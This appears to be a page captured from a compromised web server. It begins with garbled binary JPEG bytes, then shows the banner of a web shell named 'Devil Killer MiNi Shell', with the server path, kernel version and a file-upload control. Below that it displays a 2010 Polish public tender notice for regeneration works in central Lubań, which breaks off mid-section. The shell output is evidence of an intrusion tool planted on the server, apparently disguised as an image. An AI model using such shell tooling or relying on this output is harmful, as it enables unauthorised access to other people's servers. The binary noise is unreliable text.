JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/192262-N-2010.html

<p class="kh_header"><b>Lubań: Wykonanie  robót budowlanych w Lubaniu realizowanych w ramach projektu:ZAGOSPODAROWANIE I REWITALIZACJA ZDEGRADOWANYCH TERENÓW W CENTRUM MIASTA LUBAŃ</b><br>
<b>Numer ogłoszenia: 192262 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Lubań , ul. 7 Dywizji 14, 59-800 Lubań, woj. dolnośląskie, tel. 075 6464400, faks 075 6464405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  robót budowlanych w Lubaniu realizowanych w ramach projektu:ZAGOSPODAROWANIE I REWITALIZACJA ZDEGRADOWANYCH TERENÓW W CENTRUM MIASTA LUBAŃ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót, obejmuje wykonanie :
I.	ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI: WROCŁAWSKĄ, RATUSZOWĄ, STARĄ, PLACEM LOMPY - DO MURÓW OBRONNYCH:
a)	roboty drogowe w zakresie przebudowy placu na zapleczu ulicy Starej i Ratuszowej, budowie ciągów pieszo - jezdnych , chodników i ciągów pieszych, miejsc parkingowych, placów zabaw wraz z wyposażeniem i zieleni niskiej z trawnikami, klombami i pojedynczymi drzewkami ozdobnymi oraz posadowieniu ławek (siedzisk drewnianych), dostawa wraz z montażem ławek i koszy na odpady drewnianych stylowych o konstrukcji z form żeliwnych. Zestawienie powierzchni:
-	Parkingi - nawierzchnia z kostki kamiennej - 627 m2, warstwy:
*	Kostka kamienna 9x11cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Parkingi - nawierzchnia z kostki betonowej szarej - 524 m2, warstwy:
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Ciągi pieszo - jezdne - nawierzchnie z kostki betonowej szarej  - 952 m2;
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Place - nawierzchnia z kostki betonowej szarej - 811 m2;
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Chodniki - nawierzchnia z kostki betonowej szarej - 2913 m2;
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
-	Wbudowanie krawężników betonowych 15x30x100cm na ławie betonowej z oporem z betonu B-15;
-	Wbudowanie obrzeży betonowych 8x15x75cm na podsypce cementowo - piaskowej;
-	Wykonanie ścieków przykrawężnikowych z kostki betonowej koloru czerwonego grub. 8 cm w dwóch rzędach na ławie betonowej na długości 784 mb;
-	Wykonanie umocnienia na powierzchni 90 m2 skarp nasypów płytami prefabrykowanymi ażurowymi wraz z humusowaniem i obsianiem trawą otworów płyt;
-	Przebudowa schodów betonowych i z płyt betonowych 50x50 cm na schody o konstrukcji z obrzeży i kostki betonowej;
*	Długość stopni z obrzeży betonowych - 42,5mb
*	Ciągi piesze z kostki betonowej - 6,9m2;
*	Poręcze z rur stalowych - 20 mb.
-	Place zabaw - 191 m2  o nawierzchni z mieszanek mineralnych obramowane obrzeżem betonowym  wraz z wyposażeniem:
--	Plac zabaw na zapleczu ul. Wrocławskiej wyposażony w:
*	Zestaw zabawowy ( trzy zadaszone wieże, zjeżdżalnia z drabinką wejścia i balkonem, dwa talerze służące do wchodzenia i zeskoków, pomiędzy dwoma wieżami jedno przejście o charakterze pomostu ruchomego wykonanego z lin oraz listew, drugie przejście jako pajęczyną z lin, linowa drabinka wejścia) - 1 kpl;
--	Plac zabaw na zapleczu Placu Lompy wyposażony w :
*	Ściankę sprawnościową (huśtawka, ściana z lin, drabinka oraz linka z kulami, ścianka z opon i łańcucha, drążek, szczebelki poziome do podciągania) - 1 szt;
*	Karuzelę tarczową pochyłą o150cm - 1 szt.;
*	Piaskownicę betonową okrągłą - 1 szt.;
*	Stół do piaskownicy z betonu o100cm - 1 szt.;
*	Skoczka  ze stali nierdzewnej - 2 szt.
--	Plac zabaw na zapleczu ul. Starej wyposażony w:
*	Walec wąski obrotowy z bieżnią z klepek dębowych - 1 szt.;
*	Karuzelę tarczową pochyłą o150cm - 1 szt.;
*	Zjeżdżalnię ze schodkami 2,03m - 1 szt.;
*	Piaskownicę betonową okrągłą - 1 szt.;
*	Stół do piaskownicy z betonu o100cm - 1 szt.;
*	Skoczka ze stali nierdzewnej - 2 szt.;
b)	roboty instalacyjne w zakresie budowy i uzupełnienia elementów kanalizacji deszczowej:
-	Długość sieci kanalizacji deszczowej - 42,2 mb;
-	Długość przykanalików - 5,6 mb;
-	Studnie o1000 i o425 - 2 szt.
-	Wpusty deszczowe typowe uliczne - 2 szt.
c)  roboty budowlane związane z remontem odcinka muru obronnego z kamienia bazaltowego - 34,65 m3 wraz z wymiana ogrodzenia zabezpieczającego z przęseł ozdobnych na słupkach metalowych 24,00 m2 oraz schodów betonowych na schody z kostki betonowej 90 m2 i obrzeży 166,3 mb wraz z ustawieniem poręczy                      i montażem pochwytów 51,00 mb - teren pomiędzy ulicami Starą i ulica Podwale. 
II.	ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI BRACKĄ                                 I SPÓŁDZIELCZĄ:
a)	roboty drogowe w zakresie budowy ciągów pieszo - jezdnych , odwodnienia powierzchniowego ściekami, zieleni niskiej z trawnikami i pojedynczymi drzewkami ozdobnymi, murku oporowego z cegły klinkierowej oraz posadowieniu ławek (siedzisk drewnianych) z kwietnikami.                       Zestawienie powierzchni:
-	Ciągi pieszo - jezdne o nawierzchni z kostki kamiennej  - 715 m2, w tym:
--	Warstwy dla części jezdnej placu:
*	Kostka granitowa 9x11cm;
*	Podsypka z miału kamiennego - gr. 3cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
--	Warstwy dla części pieszej placu:
*	Kostka granitowa 4x6cm;
*	Podsypka z miału kamiennego - gr. 5cm;
*	Podbudowa z piasku gruboziarnistego stabilizowanego mechanicznie             - gr. 8cm .
--	Warstwy konstrukcyjne ścieku:
*	Kostka granitowa 18x20cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 3cm;
*	Ława z betonu B-10 - gr. 10cm;
*	Piasek gruboziarnisty - gr. 10cm.
-	Wybudowanie cokołów (murków oporowych) i miejsc odpoczynku z cegły klinkierowej 24x36cm z drewnianymi siedziskami i kwietnikami oraz zamontowanie koszy na odpady i stojaków dla rowerów;
-	Wbudowanie krawężników kamiennych 15x20x80cm na ławie betonowej                z oporem z betonu B-15 na obramowaniu miejsc zasadzenia drzew ozdobnych.
-	Sadzenie drzew i obsadzenie kwietników oraz urządzenie trawników.
III.	ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI WĄSKĄ I TKACKĄ              W LUBANIU:
a)	roboty drogowe w zakresie budowy ciągów pieszo - jezdnych, chodników, zieleni niskiej z trawnikami, murków oporowych z cegły klinkierowej oraz posadowieniu ławek (siedzisk drewnianych). Zestawienie powierzchni:
-	Ciągi pieszo - jezdne - nawierzchnie z kostki betonowej - 424 m2, warstwy:
--	Dla części jezdnej placu:
*	Kostka betonowa koloru szarego gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
--	Dla części pieszej placu:
*	Kostka betonowa koloru czerwonego gr. 6cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 3 - 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
-    Wybudowanie schodów z kostki betonowej koloru czerwonego i szarego gr.8 cm i obrzeży betonowych 30 x 8 cm łączących plac z ulicą Grunwaldzką; 
-	Wybudowanie murków oporowych z cegły klinkierowej o szer. 38cm i zmiennej wysokości 1,00 - 1,56m na ławie betonowej z betonu B-10 o wymiarach 30x38cm i miejsc odpoczynku z cegły klinkierowej 24x36cm z drewnianymi siedziskami oraz zamontowanie koszy na odpady i stojaków dla rowerów;
-	Wykonanie ścieku z trzech rzędów kostki betonowej o szer. 30cm na podsypce cementowo - piaskowej gr. 3cm na ławie z betonu B-15 o wym. 20x30cm;
-	Uzupełnienie odwodnienia placu poprzez wykonanie odwodnienia liniowego dług. 3,5 m, studni systemowej 425 mm, przykanału z rur PVC 200 mm dług 14.5 mb wraz z włączeniem w istniejącą w ulicy Grunwaldzkiej na kanale deszczowym studnię rewizyjną; 
-	Wbudowanie krawężników betonowych 15x20x1000cm na podsypce piaskowej gr. 5cm na ławie betonowej z oporem z betonu B-15.
-	Wbudowanie obrzeży betonowych 8x15x75cm na ławie betonowej z betonu B-15.

b)	Robotach elektrycznych w zakresie uzupełnienia oświetlenia ulicznego:
-	Długość linii kablowej - 27 mb;
-	Słupy typu parkowego z lampą oświetleniową - 1 szt.

IV.	ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI: SPÓŁDZIELCZA, RATUSZOWA, PLAC STRAŻACKI I MURAMI OBRONNYMI W LUBANIU:
a)	Robotach drogowych w zakresie budowy ciągów pieszo - jezdnych, miejsc postojowych, placów, chodników, placu zabaw i boiska syntetycznego do gry w koszykówkę i siatkówkę, zieleni niskiej z trawnikami, pojedynczymi drzewkami ozdobnymi i krzewami ozdobnymi na żywopłoty oraz miejsc odpoczynku z cegły klinkierowej 24x36cm z drewnianymi siedziskami, dostawa wraz z montażem ławek i koszy na odpady drewnianych stylowych o konstrukcji z form żeliwnych Zestawienie powierzchni:
-	Place - nawierzchnia z kostki bazaltowej z wcześniejszej rozbiórki - 1255 m2, warstwy:
*	Kostka bazaltowa - gr. 14cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Ciągi pieszo - jezdne i miejsca postojowe - 2505 m2, warstwy:
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm;
*	Dolna warstwa podbudowy z kruszywa łamanego 0-63mm stabilizowanego mechanicznie - gr. 15cm;
*	Warstwa odcinająca z piasku gruboziarnistego - gr. 15cm.
-	Chodniki - 1191 m2, warstwy:
*	Kostka betonowa szara - gr. 8cm;
*	Podsypka cementowo - piaskowa1:4 - gr. 5cm;
*	Górna warstwa podbudowy z kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie - gr. 8cm.
-	Wbudowanie krawężników betonowych 15x30x100cm na ławie betonowej z oporem z betonu B-15;
-	Wbudowanie obrzeży betonowych 8x15x75cm na podsypce cementowo - piaskowej;
-	Boisko o nawierzchni sztucznej - 260 m2, warstwy:
*	wodoprzepuszczalna nawierzchnia poliuretanowo-gumowa typu ELTAN P o gr. gotowej nawierzchni 45mm;
*	warstwa wyrównawcza z miału kamiennego (frakcja 0-4 mm) gr. 4 cm;
*	warstwa klinująca z kruszywa łamanego stabilizowanego mechanicznie (kliniec 0-31,5mm) - gr. 5cm;
*	warstwa konstrukcyjna z kruszywa łamanego stabilizowanego mechanicznie (tłuczeń 31,5-63mm) - gr. 10cm;
*	warstwa odsączająca z piasku lub pospółki - gr. 10cm;
*	żwir (frakcja 5-25 mm) - gr. od 10cm do 80 cm (w rowkach drenarskich);
*	drenaż - wg projektu odwodnienia;
*	grunt rodzimy
wraz z wyposażeniem:
*	Stojak stalowy ocynkowany regulowany o wysięgu 160cm, tablica 180x105cm, obręcz uchylna, siateczka metalowa do obręczy - 2 szt.;
*	Słupki stalowe montowane w tulejach z regulacją wysokości mocowania siatki i mechanizmem naciągowym, siatka całosezonowa - 1 kpl;
-	Place zabaw - 443 m2 wraz z wyposażeniem:
--	Plac zabaw na zapleczu ul. Spółdzielczej:
*	Ścianka sprawnościowa (huśtawka, ściana z lin, drabinka oraz linka z kulami, ścianka z opon i łańcucha, drążek, szczebelki poziome do podciągania) - 1 szt.;
*	Karuzela tarczowa pochyła o150cm - 1 szt.;
*	Piaskownica betonowa okrągła - 1 szt.;
*	Stół do piaskownicy z betonu o100cm - 1 szt.;
*	Skoczek (stal nierdzewna) - 2 szt.;
*	Huśtawka wagowa podwójna - 1 szt.;
--	Plac zabaw ona zapleczu ul. Ratuszowej:
*	Zestaw zabawowy (dwie zadaszone wieże, zjeżdżalnia o dł. 2200 z drabinką wejściową, pomiędzy wieżami przejście o charakterze pomostu ruchomego wykonanego z lin oraz listew, miniścianki do wspinaczki) - 1 kpl;
*	Huśtawka ramieniowa 2-osobowa 2,40m - 1 szt,;
*	Walec wąski obrotowy z bieżnią z klepek dębowych - 1 szt,;
*	Karuzela tarczowa pochyła o150cm - 1 szt.;
*	Stół pingpongowy do osadzenia w podłożu - 1 szt.;
*	Piaskownica 3,20x3,20m - 1 szt.;
*	Stół do piaskownicy z betonu o100cm - 1 szt.;
*	Huśtawka wagowa podwójna - 1 szt.;
*	Słup z pałąkami do wspinaczki - 1 szt.;
*	Skoczek (stal nierdzewna) - 2 szt.
b)	Robotach instalacyjnych w zakresie budowy kanalizacji deszczowej:
-	Długość sieci kanalizacji deszczowej - 88,3 mb;
-	Długość przykanalików - 121,9 mb;
-	Studnie o1200 i o425 - 8 szt.
-	Wpusty deszczowe typowe uliczne - 17 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówienia uzupełniającego w trybie zamówienia z wolnej ręki - na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.50-6, 45.23.32.53-7, 45.22.33.00-9, 45.11.27.20-8, 45.11.27.23-9, 45.23.13.00-8, 45.11.27.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 50.000 zł (słownie: pięćdziesiąt tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia ww warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę: a)oświadczenie o spełnienie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w okresie ostatnich 5 lat przed upływem terminu składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli, co najmniej dwie roboty budowlane o wartości minimum po 2.000.000,00 zł brutto. 
Warunek będzie spełniony jeżeli Wykonawca wykaże, że zakres robót wykazanych przez Wykonawcę obejmował między innymi roboty związane z budową lub przebudową dróg, chodników, ciągów pieszo - jezdnych z użyciem kostki betonowej i kamiennej, przebudowę i renowacje terenów zielonych wraz z nasadzeniami drzew i krzewów, murów oporowych, schodów, wykonanie nawierzchni z mieszanek mineralnych podobnego typu jak np. Hansa Grand, nawierzchni boisk z tworzyw sztucznych,  budowę lub przebudowę instalacji kanalizacji deszczowej, oświetlenia ulicznego montażu elementów małej architektury oraz wyposażenia placów zabaw.
Ocena spełnienia ww warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku (wiedzy i doświadczenia), wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika Nr 4A do niniejszej Instrukcji dla Wykonawcy,
b)	dokumenty potwierdzające, że wymienione w wykazie roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np.: referencje, listy polecające, opinie inspektora nadzoru, protokół odbioru robót itp.);
c)	oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia ww warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę: a)oświadczenie o spełnienie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie niżej wymienionymi osobami, które będą uczestniczyć w wykonywaniu zamówienia 
- kierownik budowy posiadający odpowiednie wykształcenie techniczne i praktykę zawodową potwierdzone uprawnieniami budowlanymi w odpowiedniej specjalności.
- kierownicy robót posiadający odpowiednie wykształcenie techniczne i praktykę zawodową potwierdzone uprawnieniami budowlanymi w specjalności 
a) instalacji sanitarnych;
b) instalacji elektrycznych (obwody i instalacje n/n do 1 kV oświetlenia dróg,  placów i ulic);
c) budowy i konserwacji terenów zieleni.    
Ocena spełnienia ww warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za kierowanie robotami wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika  Nr 4B do Instrukcja dla Wykonawcy,
b)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia  (wymienione w wykazie osoby) posiadają wymagane uprawnienia - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika Nr 4C do Instrukcja dla Wykonawcy. Zamawiający nie wymaga kserokopii uprawnień 
i zaświadczeń o przynależności do właściwej izby samorządu zawodowego. 
c)	oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności na kwotę równą lub wyższą niż 500.000 zł.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą lub wyższą niż 500.000 zł. Jeżeli z treści polisy nie wynika fakt jej opłacenia do oferty należy dołączyć dokument potwierdzający opłacenie polisy, 
b)	oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
